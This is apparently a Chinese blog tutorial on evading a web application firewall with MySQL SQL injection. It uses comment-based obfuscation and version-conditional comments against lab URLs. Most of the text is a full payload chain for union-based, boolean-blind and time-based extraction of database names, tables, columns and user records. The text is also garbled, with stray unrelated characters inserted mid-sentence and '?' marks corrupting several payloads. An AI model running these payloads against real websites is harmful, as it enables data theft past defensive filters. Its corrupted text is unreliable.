我們可以活躍頭腦將and1=1換成-1=-1之類的或者使用or mod(8,7) in (1)意思是8/7余數(shù)等于1

組合繞過：

http://192.168.222.128/test/sql.php?id=1/*!union*//*%!aa*//*!select*/?1,2,3

先判斷注入點舶吗，把and為&&征冷，urlencode后為%26%26

http://192.168.0.102:8080/sql.php?id=1%20%26%26%20-1=-2

下面我們具體講解繞過方法：

1.利用()代替空格

2.利用mysql特性/*!*/執(zhí)行語句

3.利用/**/混淆代碼

我給出的注入語句是：

union/*%00*//*!50010select*/(database/**/()),(user/**/())%23

id=1/*|%23--%23|*/unioN/*|%23--%23|*/sElect/*|%23--%23|*/1,???? user(),(database/**/()),4,5

http://192.168.0.102:8080/sql.php?id=1union/*%00*//*!50010select*/1,user(),version(),4,5

這里要注意的幾點是：

1.mysql關(guān)鍵字中是不能插入/**/的择膝，即se/**/lect是會報錯的，但是函數(shù)名和括號之間是可以加上/**/的,像database/**/()這樣的代碼是可以執(zhí)行的

2./*!*/中間的代碼是可以執(zhí)行的检激，其中50010為mysql版本號肴捉，只要mysql大于這個版本就會執(zhí)行里面的代碼

3.數(shù)據(jù)或者函數(shù)周圍可以無限嵌套()

4.利用好%00?user())

完整過狗注入語句

判斷注入點：

?1'/**/%26%261%3d2%23

判斷列數(shù)：

1'?order?by?2%23

關(guān)聯(lián)查詢爆出用戶和數(shù)據(jù)庫：?

1%27%20union/*%00*//*!50010select*/(database/**/()),(user/**/())%23

關(guān)聯(lián)查詢爆出數(shù)據(jù)表：?

%27%20union/*%00*//*!50010select*/((group_concat(table_name))),null/**/from/**/((information_schema.TABLES))/**/where/**/TABLE_SCHEMA%3d(database/**/())%23

關(guān)聯(lián)查詢爆出字段值：?

%27%20union/*%00*//*!50010select*/((group_concat(COLUMN_NAME))),null/**/from/**/((information_schema.columns))/**/where/**/TABLE_NAME%3d%27users%27%23

關(guān)聯(lián)查詢提取數(shù)據(jù)：

?%27%20union/*%00*//*!50010select*/((group_concat(first_name))),null/**/from/**/((users))%23

盲注爆出數(shù)據(jù)庫：?

1' and substr(database/**/(),1,1)%3d'1'%23

盲注爆出數(shù)據(jù)表：?

1'/*%00*/and?substr((/*!50010select*/((group_concat(table_name)))/**/from/**/((information_schema.TABLES))/**/where/**/TABLE_SCHEMA%3d(database/**/())),1,1)%3d'1'%23

盲注爆出字段值：

?1'/*%00*/and substr((/*!50010select*/((group_concat(COLUMN_NAME)))/**/from/**/((information_schema.columns))/**/where/**/TABLE_NAME%3d%27users%27),1,1)%3d'1'%23

盲注提取數(shù)據(jù)：?

1'/*%00*/and?substr((/*!50010select*/((group_concat(first_name)))/**/from/**/((users))),1,1)%3d'1'%23

基于時間的盲注爆出數(shù)據(jù)庫：

?1'/*%00*/and (select case when (substr(database/**/(),1,1) like 'd') then sleep/**/(3) else 0 end)%23

基于時間的盲注爆出數(shù)據(jù)表：?

1'/*%00*/and?(select?case?when?(substr((/*!50010select*/((group_concat(table_name)))/**/from/**/((information_schema.TABLES))/**/where/**/TABLE_SCHEMA%3d(database/**/())),1,1)?like?'d')?then?sleep/**/(3)?else?0?end)%23

基于時間的盲注爆出字段值：?

1'/*%00*/and (select case when (substr((/*!50010select*/((group_concat(COLUMN_NAME)))/**/from/**/((information_schema.columns))/**/where/**/TABLE_NAME%3d%27users%27),1,1) like 'd') then sleep/**/(3) else 0 end)%23

基于時間的盲注提取數(shù)據(jù)： 1'/*%00*/and?(select?case?when?(substr((/*!50010select*/((group_concat(first_name)))/**/from/**/((users))),1,1)?like?'d')?then?sleep/**/(3)?else?0?end)%23